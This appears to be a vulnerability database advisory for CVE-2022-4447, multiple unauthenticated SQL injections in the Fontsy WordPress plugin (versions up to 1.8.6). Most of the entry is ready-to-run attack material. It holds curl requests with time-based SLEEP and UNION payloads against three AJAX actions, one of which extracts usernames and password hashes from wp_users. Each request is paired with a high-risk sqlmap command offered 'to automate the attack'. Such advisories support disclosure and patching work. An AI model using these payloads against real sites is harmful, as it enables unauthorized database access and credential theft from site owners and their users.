Lucene search
CydaveWPEX-ID:6939C405-AC62-4144-BD86-944D7B89D0ADHistoryDec 21, 2022 - 12:00 a.m.
Fontsy <= 1.8.6 - Multiple Unauthenticated SQLi
2022-12-2100:00:00
cydave
68
fontsy
sql injection
unauthenticated
EPSS
0.088
Percentile
94.7%
The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
curl -i 'http://example.com/wp-admin/admin-ajax.php?action=get_fonts' \
--data 'id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))hewu)'
... or use the sqlmap command below to automate the attack:
sqlmap -u 'http://example.com/wp-admin/admin-ajax.php?action=get_fonts' \
--data 'id=1' \
-p id \
--risk 3 \
--level 5 \
--dbms mysql \
--batch
---
curl -i 'http://example.com/wp-admin/admin-ajax.php?action=get_tag_fonts' \
--data 'id=-1 UNION ALL SELECT NULL,NULL,NULL,CONCAT((SELECT user_login from wp_users),CHR(0x3a),(SELECT user_pass from wp_users)),NULL-- -'
... or use the sqlmap command below to automate the attack:
sqlmap -u 'http://example.com/wp-admin/admin-ajax.php?action=get_tag_fonts' \
--data 'id=1' \
-p id \
--risk 3 \
--level 5 \
--dbms mysql \
--batch
---
curl -i 'http://example.com/wp-admin/admin-ajax.php?action=delete_fonts' \
--data 'font_id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))kfTw)'
... or use the sqlmap command below to automate the attack:
sqlmap -u 'http://example.com/wp-admin/admin-ajax.php?action=delete_fonts' \
--data 'font_id=1' \
-p font_id \
--risk 3 \
--level 5 \
--dbms mysql \
--batchRelated
cve
cve
CVE-2022-4447
2023-01-16 16:15:11
wpvulndb
wpvulndb
Fontsy <= 1.8.6 - Multiple Unauthenticated SQLi
2022-12-21 00:00:00
cvelist
cvelist
CVE-2022-4447 Fontsy <= 1.8.6 - Multiple Unauthenticated SQLi
2023-01-16 15:38:06
nvd
nvd
CVE-2022-4447
2023-01-16 16:15:11
prion
prion
Sql injection
2023-01-16 16:15:00
nuclei
nuclei
WordPress Fontsy <=1.8.6 - SQL Injection
2023-01-14 05:54:28